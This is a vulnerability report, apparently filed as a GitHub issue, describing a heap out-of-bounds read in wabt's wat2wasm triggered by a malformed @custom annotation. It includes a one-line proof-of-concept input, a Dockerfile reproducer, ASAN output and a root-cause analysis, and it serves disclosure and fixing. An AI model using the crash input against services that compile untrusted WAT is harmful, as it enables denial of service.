heap OOB read / SEGV in BinaryWriter::WriteExpr #2742

@DavidKorczynski

Description of the vulnerability and its impact

When wat2wasm processes a WAT file containing a @custom annotation inside a function
body (e.g. @custom "a"), ParseCodeMetadataAnnotation calls name.remove_prefix(14)
on the token text "custom" (6 bytes) without first checking that the name starts with
"metadata.code.". This violates the C++ precondition for std::string_view::remove_prefix,
producing a corrupted string_view with a pointer advanced 14 bytes past the token
allocation and a length of 0xFFFFFFFFFFFFFFF8 (unsigned wraparound). The corrupted
view is stored in a CodeMetadataExpr node and later used as a key in
std::unordered_map<std::string_view, CodeMetadataSection> inside BinaryWriter::WriteExpr,
causing the hash function to attempt a read of ~18 exabytes from an invalid address.

Impact: Deterministic crash (DoS) of any pipeline running wat2wasm --enable-annotations
on untrusted input. The corrupted pointer is heap-relative, creating a theoretical (but
non-trivial) memory disclosure primitive.

First faulty condition: src/wast-parser.cc:2314, where name.remove_prefix(sizeof("metadata.code.") - 1) is called without a prior starts_with("metadata.code.") guard.

Crash site: src/binary-writer.cc:1189, where BinaryWriter::WriteExpr hashes the corrupted string_view.


How to reproduce

echo '(module(func(@custom "a")))' > poc.wat
wat2wasm --enable-annotations poc.wat -o /dev/null

Crashes deterministically on current HEAD. No special heap layout or environment required.

ASAN output:

==10==ERROR: AddressSanitizer: SEGV on unknown address 0x603000010000
==10==The signal is caused by a READ memory access.
    #0 in std::_Hash_bytes(void const*, unsigned long, unsigned long)
    #1 in std::hash<std::string_view>::operator()
    #2 in std::unordered_map<std::string_view, ...>::operator[]
    #3 in wabt::(anonymous namespace)::BinaryWriter::WriteExpr
           /build/repo/src/binary-writer.cc:1189
    #4 in BinaryWriter::WriteExprList /build/repo/src/binary-writer.cc:1203
    #5 in BinaryWriter::WriteFunc    /build/repo/src/binary-writer.cc:1229
    #6 in BinaryWriter::WriteModule  /build/repo/src/binary-writer.cc:1737
    #7 in wabt::WriteBinaryModule    /build/repo/src/binary-writer.cc:1947
    #8 in ProgramMain                /build/repo/src/tools/wat2wasm.cc:152

The following Dockerfile is a full end-to-end reproducer:

FROM ubuntu:24.04

ENV DEBIAN_FRONTEND=noninteractive
ENV TZ=UTC

RUN apt-get update && apt-get install -y --no-install-recommends \
    git \
    cmake \
    ninja-build \
    clang-18 \
    llvm-18 \
    libclang-rt-18-dev \
    python3 \
    ca-certificates \
    && rm -rf /var/lib/apt/lists/*

# Clone wabt at HEAD (unpatched as of April 2026)
RUN git clone --depth=1 --recurse-submodules https://github.com/WebAssembly/wabt.git /build/repo \
    && cd /build/repo && git log -1 --oneline

# Build wat2wasm with ASAN using clang-18
RUN mkdir -p /build/repo/build && \
    cmake -S /build/repo -B /build/repo/build \
        -GNinja \
        -DCMAKE_BUILD_TYPE=Debug \
        -DCMAKE_C_COMPILER=clang-18 \
        -DCMAKE_CXX_COMPILER=clang++-18 \
        "-DCMAKE_C_FLAGS=-fsanitize=address -g -O1 -fno-omit-frame-pointer" \
        "-DCMAKE_CXX_FLAGS=-fsanitize=address -g -O1 -fno-omit-frame-pointer" \
        "-DCMAKE_EXE_LINKER_FLAGS=-fsanitize=address" \
        -DBUILD_TESTS=OFF \
    && ninja -C /build/repo/build wat2wasm

# Embed the PoC: 27-byte WAT text that triggers the bug
RUN echo '(module(func(@custom "a")))' > /build/poc.wat

# Show the vulnerable source region and then trigger the ASAN crash
CMD ["/bin/sh", "-c", \
    "echo '=== Vulnerable source (src/wast-parser.cc — ParseCodeMetadataAnnotation) ===' && \
     grep -n 'remove_prefix' /build/repo/src/wast-parser.cc | head -5 && \
     echo '' && \
     echo '=== ASAN crash ===' && \
     ASAN_OPTIONS='detect_leaks=0:print_stacktrace=1' \
     ASAN_SYMBOLIZER_PATH=$(which llvm-symbolizer-18) \
       /build/repo/build/wat2wasm --enable-annotations /build/poc.wat -o /dev/null 2>&1; exit 1"]

Which WABT tools or library functions are affected

  • Tool: wat2wasm
  • Vulnerable function: WastParser::ParseCodeMetadataAnnotation (src/wast-parser.cc:2314)
  • Crash site: BinaryWriter::WriteExpr (src/binary-writer.cc:1189)

Which WebAssembly features must be enabled

--enable-annotations — the crash is only reachable when annotation parsing is
enabled. The @custom token is only accepted under this flag.


Root Cause Analysis

Background

wabt's wat2wasm tool compiles WebAssembly Text Format (WAT) to binary. The --enable-annotations flag activates support for WAT annotations — syntactic extensions of the form (@name ...). One annotation type is metadata.code.*, used to attach custom metadata to instructions for toolchain pipelines. The annotation name must begin with the 14-byte prefix "metadata.code." for this feature to work correctly.

Vulnerable Code

// src/wast-parser.cc:2310 — WastParser::ParseCodeMetadataAnnotation
Result WastParser::ParseCodeMetadataAnnotation(ExprList* exprs) {
  WABT_TRACE(ParseCodeMetadataAnnotation);
  Token tk = Consume();
  std::string_view name = tk.text();
  name.remove_prefix(sizeof("metadata.code.") - 1);  // line 2314 — BUG
  std::string data_text;
  CHECK_RESULT(ParseQuotedText(&data_text, false));
  std::vector<uint8_t> data(data_text.begin(), data_text.end());
  exprs->push_back(std::make_unique<CodeMetadataExpr>(name, std::move(data)));
  EXPECT(Rpar);
  return Result::Ok;
}

Plain explanation: The function assumes that any annotation token reaching it begins with the 14-byte prefix "metadata.code." and strips that prefix unconditionally. When the token is "custom" (6 bytes), stripping 14 bytes is undefined behavior; in the build shown above it yields a string_view that points past the end of the token buffer and has a wrapped, near-maximal length.

Precise explanation: sizeof("metadata.code.") - 1 is 14. Calling remove_prefix(14) on a string_view of size 6 advances the internal data_ pointer by 14 bytes (into adjacent heap memory or lexer state) and sets size_ to 6 - 14 = -8, which as size_t is 0xFFFFFFFFFFFFFFF8. The resulting string_view is stored — without copying — into CodeMetadataExpr::name (a std::string_view member). At binary write time, BinaryWriter::WriteExpr uses this as a key in std::unordered_map<std::string_view, CodeMetadataSection>, which hashes the string_view by calling std::_Hash_impl::hash(data_ptr, 0xFFFFFFFFFFFFFFF8) — a read of ~18 exabytes from an invalid address, immediately caught by ASAN as a SEGV.
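The length arithmetic above can be checked without invoking the undefined behavior itself. The following is a minimal sketch, assuming a 64-bit size_t; UncheckedSizeAfterRemovePrefix is a hypothetical helper written for this illustration and is not part of wabt. It only mirrors the unchecked subtraction that a typical remove_prefix implementation performs on the stored length.

```cpp
#include <cstddef>
#include <string_view>

// Hypothetical helper (not part of wabt): the length a string_view would
// report if `n` were subtracted from its size with no bounds check.
constexpr std::size_t UncheckedSizeAfterRemovePrefix(std::string_view sv,
                                                     std::size_t n) {
  return sv.size() - n;  // unsigned arithmetic wraps; no UB in this line
}

// Length of "metadata.code." without the terminating NUL.
constexpr std::size_t kPrefixLen = sizeof("metadata.code.") - 1;
static_assert(kPrefixLen == 14, "prefix is 14 bytes");

// On a 64-bit target, 6 - 14 wraps to 2^64 - 8 = 0xFFFFFFFFFFFFFFF8.
static_assert(sizeof(std::size_t) != 8 ||
                  UncheckedSizeAfterRemovePrefix("custom", kPrefixLen) ==
                      0xFFFFFFFFFFFFFFF8ull,
              "size wraps around to a near-maximal value");
```

Both static_asserts are evaluated at compile time, so the snippet compiles only if the values match the ones quoted in the report.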

The root cause is the absence of a guard in ParseCodeMetadataAnnotation verifying that the annotation name actually starts with "metadata.code." before calling remove_prefix. A corresponding guard exists at module level (in the lexer's annotation token accumulation), but not in the expression-level dispatcher.
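One possible shape for the missing guard is sketched below. This is an illustration under stated assumptions, not the upstream patch: StripCodeMetadataPrefix is a hypothetical standalone helper, and how ParseCodeMetadataAnnotation should report the failure (for example by returning Result::Error) is left to the maintainers.

```cpp
#include <optional>
#include <string_view>

// Hypothetical helper, not the upstream wabt fix: returns the annotation
// name with "metadata.code." stripped, or std::nullopt when the prefix is
// absent, so remove_prefix is never called with n > size().
inline std::optional<std::string_view> StripCodeMetadataPrefix(
    std::string_view name) {
  constexpr std::string_view kPrefix = "metadata.code.";
  // compare(pos, count, sv) clamps `count` to the available length, so a
  // short name such as "custom" is rejected without reading out of bounds.
  if (name.compare(0, kPrefix.size(), kPrefix) != 0) {
    return std::nullopt;
  }
  name.remove_prefix(kPrefix.size());  // safe: size() >= kPrefix.size()
  return name;
}
```

With a check of this kind, the token "custom" from the PoC would be rejected at parse time instead of producing a corrupted view, while a name such as "metadata.code.branch_hint" would still yield "branch_hint".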
